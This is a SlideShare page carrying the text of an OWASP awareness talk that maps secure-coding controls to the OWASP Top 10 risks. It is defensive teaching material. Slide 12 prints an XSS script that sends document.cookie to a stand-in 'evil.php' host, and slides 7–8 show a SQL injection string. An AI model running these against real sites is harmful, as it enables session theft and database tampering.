SecDevOps for API Security
SecDevOps for API SecuritySecDevOps for API Security
SecDevOps for API Security42Crunch
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Owasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilitiesOwasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilitiesRIZWAN HASAN
 
Using Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security ProblemsUsing Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security Problemskiansahafi
 
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Ruby Meditation
 

Similaire à Owasp top-ten-mapping-2015-05-lwc (20)

The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy Anton
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
 
SecDevOps for API Security
SecDevOps for API SecuritySecDevOps for API Security
SecDevOps for API Security
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
 
owasp top 10.ppt
owasp top 10.pptowasp top 10.ppt
owasp top 10.ppt
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Owasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilitiesOwasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilities
 
Using Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security ProblemsUsing Analyzers to Resolve Security Problems
Using Analyzers to Resolve Security Problems
 
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
 

Dernier

A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringHironori Washizaki
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Cizo Technology Services
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...Akihiro Suda
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Hr365.us smith
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf31events.com
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 

Dernier (20)

A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 

Owasp top-ten-mapping-2015-05-lwc

  • 1. OWASP Top Ten Mapping Katy Anton @katyanton 1
  • 2. Katy Anton • Software developer by background • Certified Secure Software Lifecycle Practitioner (CSSLP) • OWASP volunteer • https//www.linkedin.com/in/katyanton • @katyanton 2
  • 3. OWASP Top 10 Risks A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 3
  • 4. Software Development Lifecycle 4 Design Build Test Production Vulnerability Scanning Security testing, dynamic testing tools Coding guidelines, code reviews, static test tools Security requirements, secure design, threat modelling reactiveproactive
  • 5. Warning This is an awareness document - that will give you some anchors - that you can start using on a regular basis - and start building on. You cannot base a web application on Top 10 only! 5
  • 6. C1. Parameterize queries 6 Query parameterization prevents untrusted input from being interpreted as part of a SQL command: $sql = Update users set email=‘$email’ where id=1;
  • 7. C1: Example of SQL injection 7 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’;
  • 8. C1: Example of SQL injection 8 UPDATE user SET email=‘’; -- @owasp.org' WHERE id=‘1’
  • 9. C1 Control: Data Access Layer 9 PHP: Example of Query Parametrisation $email = $_REQUEST[‘email’]; $id = $_REQUEST[‘id’]; $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
  • 10. 10 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query.
  • 11. C2. Encode data before using a parser 11
  • 12. C2: Example of XSS 12 <script type=“text/javascript”> var adr = ‘http://myaddress.com/evil.php? stolencookies=‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  • 13. C2: Mechanisms for encoding Change from < 13
  • 14. C2: Mechanisms for encoding Change from < to &lt; 14
  • 15. C2: Resources Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript https://www.owasp.org/index.php/Category:OWASP_Enco ding_Project Java/Scala (Updated January 2015) https://www.owasp.org/index.php/OWASP_Java_Encoder_Proj ect 15
  • 16. 16 Proactive Control Risk(s) prevented C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) A1 Injection Injection flaws, such as SQL injection occur when untrusted data is sent to an interpreter as part of a command or query. A3 XSS XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 17. C3. Validate all input 17
  • 18. C3: Example of Validations 18 • GET / POST data • File upload validate ( file extension, mime type, size) • HTTP Headers, cookies
  • 19. 19 Proactive Control Risk(s) prevented C3: Validate all inputs For web applications this includes: • GET and POST parameters: • File uploads • any or all of this data could be manipulated by an attacker. •A1 Injection •A3 XSS •A10 Unvalidated redirects and forwards
  • 20. C4. Implement appropriate Access Control 20
  • 21. C4: Access Control good practices • Deny by default • Force all requests to go through access control checks • Check on the server when each function is accessed 21
  • 22. 22 Proactive Control Risk(s) prevented C4: Implement Appropriate Access Controls •Deny by default •Force all requests to go through access control checks •Check on the server when each function is accessed A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check, attackers can manipulate these references to access unauthorised data. A7-Missing Function Level Access Control Attackers will be able to forge requests in order to access functionality without proper authorization.
  • 23. C5. Establish Authentication and Identity Controls 23
  • 24. 1). Protection: Password storage 24 1) Use cryptographically strong credential- specific salt • protect( [salt] + [password] ); • Use a 32char or 64char salt; • Do not depend on hiding, splitting, or otherwise obscuring the salt.
  • 25. 1). Protection: Password storage 25 2) Impose difficult verification on the attacker and defender •PBKDF2([salt] + [password], c=100,000); •Cryptgraphic recommendations: • PBKDF2 (Password-Based Key Derivation 2) • bcrypt • scrypt
  • 26. 1). Protection: Password storage 26 Resources: https://www.owasp.org/index.php/Password_Storage_ Cheat_Sheet
  • 27. 2). Protection: multi-factor authentication Multi-factor authentication - a combination of: • Something you know – password or PIN • Something you own – token, smart card or phone • Something you are – biometrics ( fingerprint ) 27
  • 28. 3). Protection: Forgot Password Forgot password design: 1). Ask one or more security questions 2) Send the user a randomly generated token via: app, SMS 3). Verify code in same web session. 4). Change password. More details on: https://www.owasp.org/index.php/Forgot_Password_Chea t_Sheet 28
  • 29. 29 Proactive Control Risk(s) prevented C5: Establish Identity and Authentication Controls • Design ( password storage) • Multi-factor authentication • Design ( forgot password ) A2-Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
  • 30. C6. Data Protection and Privacy 30
  • 31. C6 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you are visiting is the right one HTTPS configuration best practices • https://www.owasp.org/index.php/Transport_Layer _Protection_Cheat_Sheet Data at rest 31
  • 32. C6 Controls: Data at rest 1. Algorithm • AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing Resources: • https://www.owasp.org/index.php/Cryptographic_Stor age_Cheat_Sheet • https://www.ssllabs.com/ssltest/index.html 32
  • 33. 33 Proactive Control Risk(s) prevented C6: Data Protection and privacy • Data encryption at rest • Data encryption in transit A6: Sensitive Data Exposure Sensitive data needs extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
  • 34. 34 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
  • 35. 35 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS OWASP Top Ten Mapping
  • 36. 36 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards OWASP Top Ten Mapping
  • 37. 37 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control OWASP Top Ten Mapping
  • 38. 38 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management OWASP Top Ten Mapping
  • 39. 39 Proactive Control Risk(s) prevented C1: Parameterize Queries Leverage to Data Access Layer how parameters are interpreted before executing SQL. • A1 Injection • A10 Unvalidated redirects and forwards C2: Encode Data Encode data before use in a parser ( JS, CSS , XML ) • A1 Injection • A3 XSS C3: Validate all inputs • A1 Injection • A3 XSS • A10 Unvalidated redirects and forwards C4: Implement Appropriate Access Controls • A4 Insecure Direct Object References • A7 Missing Function Level Access Control C5: Establish Identity and Authentication Controls Password storage / Multi-factor authentication / Forgot password design • A2 Broken Authentication and Session Management C6: Data Protection and privacy Data encryption at rest / in transit • A6 Sensitive Data Exposure OWASP Top Ten Mapping
  • 40. C7. Logging, Error Handling and Intrusion Detection 40
  • 41. 41 Proactive Control Risk(s) prevented C7: Implement Logging, Error Handling and Intrusion Detection A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 42. C8. Leverage Security Features of Frameworks and Security Libraries 42
  • 43. 43 Proactive Control Risk(s) prevented C8: Leverage Security Features of Frameworks and Security Libraries For example: • Choose a good database ORM • Choose a framework with already build- in good access control • Choose a framework that already has integrated CSRF A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 45. C9: Security Requirements Functional requirements > visible to QA and testable > E.q: forgot password workflow, re-authentication during change password Non-Functionals requirements : > invisible to QA, not easily testable > E.q: query parametrization, password storage crypto 45
  • 46. 46 Proactive Control Risk(s) prevented C9: Security Requirements Example of security requirements: • Integrity requirements • Availability requirements • Authentication & authorization requirements • Confidentiality requirements • Auditing and logging requirements • Session management requirements • Errors and exception management requirements • Configuration parameters requirements • Archiving requirements • Legal and Compliance Constraints A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards
  • 47. C10. Security Architecture and Design 47
  • 48. C10: Security Architecture and Design Principles Secure design principles: • Least Privilege = minimum access level for minimum amount of time • Separation of duties • Defence of depth. E.q.: • input validation + parameterize queries • input validation + output encoding • Fail secure. E.q.: • user access denied after maximum number of failed logins reached • errors and exception handling; store error details in database, give user only the reference ID • Complete mediation. E.q.: • centralise access control checks • centralise input validation 48
  • 49. 49 Proactive Control Risk(s) prevented C10: Security Architecture and Design Secure design principles: • Least Privilege • Separation of duties • Defence of depth • Fail secure • Complete mediation • Open design A1-Injection A2-Broken Authentication and Session Management A3 XSS A4-Insecure Direct Object References A5-Security Misconfiguration A6-Sensitive Data Exposure A7-Missing Function Level Access Control A8-Cross-Site Request Forgery (CSRF) A9-Using Components with Known Vulnerabilities A10-Unvalidated Redirects and Forwards